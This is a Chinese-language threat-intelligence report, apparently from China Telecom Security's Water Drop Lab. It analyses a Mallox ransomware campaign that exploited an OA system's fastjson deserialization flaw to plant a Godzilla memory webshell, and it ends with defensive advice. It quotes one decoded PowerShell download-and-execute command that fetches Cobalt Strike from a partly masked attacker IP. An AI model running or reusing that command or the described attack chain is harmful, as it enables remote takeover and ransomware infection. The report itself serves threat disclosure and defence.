电信安全水滴实验室狩猎追踪发现,在2024年4月至5月,境外高级勒索团伙疑似利用30多款产品的漏洞攻击中国境内数据中心、外贸、医药、金融等行业的2000多个企业/部门。通过对事件单位(攻击对象)现场排查和全网风险检测了解,大部分攻击对象被快速投递勒索木马加密数据,一部分被植入后门后尝试内网横移,少部分终端安全软件有效拦截下载Mallox勒索木马。
在此,电信安全建议各企业/部门高度重视本次Mallox勒索团伙攻击预警,及时排查企业/部门内部是否存在网络威胁并升级系统版本,强化生产和办公网络隔离,加强重要数据和服务器备份,收敛不必要的互联网暴露面。
图1-Mallox每日新增国内攻击对象
图2-威胁风险指数分析
图3-数据风险指数分析
某OA-反序列化注入哥斯拉内存马攻击案例。
1. 根据webshell文件创建时间点2024.4.12 19:50:45去搜索相应的日志,发现某OA日志中有fastjson组件抛出异常的日志,且日志中带有可疑的序列化hex payload。
2. 攻击者通过构造恶意序列化数据通过OA接口带到内置的fastjson组件执行,而fastjson组件版本在漏洞影响范围内,最终达到命令执行效果。
图4-反序列化payload
3. 从分析还原出来的ser序列化文件,发现其利用内存马注入payload。
图5-ser序列化内存马
4. 反编译了内存马注入的payload,发现其为“哥斯拉”的内存马。
图6-内存释放“哥斯拉”后门木马
5. 终端火绒拦截日志时间为2024-4-12 11:25,发现父进程都为OA应用加载的java进程,攻击者通过Fastjson反序列化执行powershell命令内存执行达到无文件落地效果,最终被拦截。
图7-现场终端杀毒软件拦截无文件后门
6. 解码POWERSHELL命令,解码明文为:IEX (New-Object System.Net.Webclient).DownloadString('http://5.34.xxx.xxx:60001/upload/post')下载CobaltStrike木马,直接内存加载获取远程控制权限,植入Mallox勒索木马。
图8-下载CobaltStrike木马
1.3.2. 攻击链路分析
Mallox勒索团伙整体的攻击链路已经形成稳定的成体系化且具备专属武器库。攻击者成功向攻击对象植入后门后,评估确定对攻击对象内网横移攻击,会植入网络代理木马设置网络代理,并上传内网横移武器库(fscan等扫描工具)内网横移,最后加载运行勒索木马进行数据加密,这与2023年12月的专项攻击差异在于攻击使用的漏洞库和无文件模式升级。但在这次专项攻击中数据窃取双重勒索迹象不明显,因此分析其攻击目的侧重恶意数据加密以提升团伙在全球的活跃度和知名度,或表达团伙的某种思想形态。
图9-Mallox勒索团伙攻击路径还原
1.4. 综合线索分析攻击对象
1.4.1. 涉及省份和行业分析
从监测到的攻击对象分析,主要集中在北京、国内东部沿海广东、上海、浙江、江苏等省市,且都属于资产高度云化发展地区。
图10-攻击对象国内分布
或许是漏洞产品覆盖用户面的原因,本次专项攻击主要覆盖软件开发、外贸、服饰(外贸)、医药、金融等中小型企业。
图11-部分攻击对象行业归属
图12-攻击对象互联网暴露分析
图13-攻击者可能利用漏洞的时间链路
综合多维信息评估,该勒索组织攻击线索现在仍有较高的勒索攻击预警和联防联控价值,水滴实验室将持续对该组织攻击资产进行跟踪,并及时定向做出预警。
2. 处置建议
2.1前置预警建议
1. 做好重要数据和生产运营服务器备份;
2. 做好内网访问权限划分隔离;
3. 加强数据防泄漏安全建设;
4. 前置攻击资产拦截封堵;
5. 加强终端安全防护与威胁识别能力;
6. 收敛互联网出口暴露面;
7. 订阅黑客组织/团伙威胁追踪前置预警服务;
8. 加固内外网系统、服务、插件等版本升级。
2.2联防联控建议
主编:冯晓冬
原文始发于微信公众号(中国电信安全):独家情报 | 国内2000多家企业遭高级勒索团伙攻击投毒
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论